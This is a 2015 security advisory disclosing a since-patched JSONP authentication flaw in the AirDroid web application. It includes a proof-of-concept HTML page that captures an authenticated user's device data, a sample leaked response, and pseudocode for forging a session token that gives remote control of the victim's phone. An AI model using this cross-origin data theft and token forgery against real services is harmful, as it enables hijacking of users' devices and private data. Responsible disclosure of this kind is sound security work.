AirDroid Web Application Authentication Flaw

By Matt Bryant

Title

AirDroid Web Application Authentication Flaw

Release Date

April 15, 2015

Patch Date

March 2015

Reported Date

February 27, 2015 – Submitted to AirDroid

Vendor

AirDroid/Sand Studio/TongBu Networks

Systems Affected

None. Vulnerability patched as of March 2015.

Summary

AirDroid Version 3.0.4 and earlier versions' web applications use JSON with padding (JSONP) for performing cross-origin requests. Due to JSONP being an insecure method of sharing data across origins, it is possible to hijack all of the AirDroid application functionality. By doing this, other users’ Android devices can be hijacked.

Vendor Status

AirDroid has been made aware of the issue and has pushed a patch to the web interface here.

Exploit Availability

We created an exploit to demonstrate the severity of this particular vulnerability. It works as follows:

1. Construct a malicious page that sources the following JSONP endpoint:

<!DOCTYPE html>
<body>
<script>
function _callhack( stolen_data ) {
alert( JSON.stringify( stolen_data ) );
}
</script>
<script src="https://id.airdroid.com/p9/user/signIn.html?callback=_callhack"></script></body>

2. Lure an authenticated AirDroid user to the malicious page created in 1. This will result in the sourcing of the JSONP endpoint above, using the victim user’s active AirDroid web session, and the response will contain the information needed to generate a valid 7bb session token. A sample response is given below:

_callhack({"code":"1","result":{"id":"2960728","nickname":"mandatory","mail":"mandatory@[REDACTED]","create_date":"2013-11-27 03:01:58","data_flow_total":"0","vip":"0","vip_starttime":null,"vip_endtime":null,"from_type":"","read_new":"1","mail_verify":"1","pay_type":"0","isPremium":-1,"has_device":"1","device":[{"id":"2800627","name":"","deviceId":"182bed78cde24b3aa9458b[REDACTED]","channelToken":"ae089b0a0a0d[REDACTED]","logicKey":"7530f7bd7149c7c57a5[REDACTED]","manu":"samsung","model":"SM-N900V","model_pic":"http://img.airdroid.com/devices//samsung/Samsung Note 3","osVersion":"4.3","sdkApiLevel":"18","netOpts":{"ip":"[REDACTED]","port":8888,"socket_port":8889,"ssl_port":8890,"usewifi":"true"},"appVer":"67","is_default":"0","imsi":"311480[REDACTED]","create_date":"2014-08-23 22:37:18"}],"app_last_modify":"1415991234"},"msg":"success!"})

3. Using the above information, a valid 7bb session token can be generated. The follow pseudocode shows the process for creating said token:

bb = UNIX_TIMESTAMP + md5(UNIX_TIMESTAMP + DEVICE_ID + LOGIC_KEY)

Researcher

Matt Bryant of Bishop Fox

Vulnerability Details

This authentication flaw allows remote control of other users’ Android phones.
SMS: send and receive individual or group messages.
Apps: Import and export .apk files.
Files: Manage files on Android and transferring files between Android and computer.
Photos: View and manage photos on Android and transferring photos between Android and computer.
Music & Videos: Play and manage music & videos on Android and transferring them between Android and computer.
Ringtones: Set music as ringtone and export any ringtone.
Contacts: View and edit all the contacts.
Screenshot: View the real-time screen of Android devices, take static screenshots. (root required)
Camera: See through the lens of both front and back camera, also supports flashlight.
URL: Push URL to Android and open automatically open it with Android browser.
Clipboard: Share clipboard content between Android and computer.
GPS: Track the mobile device’s location.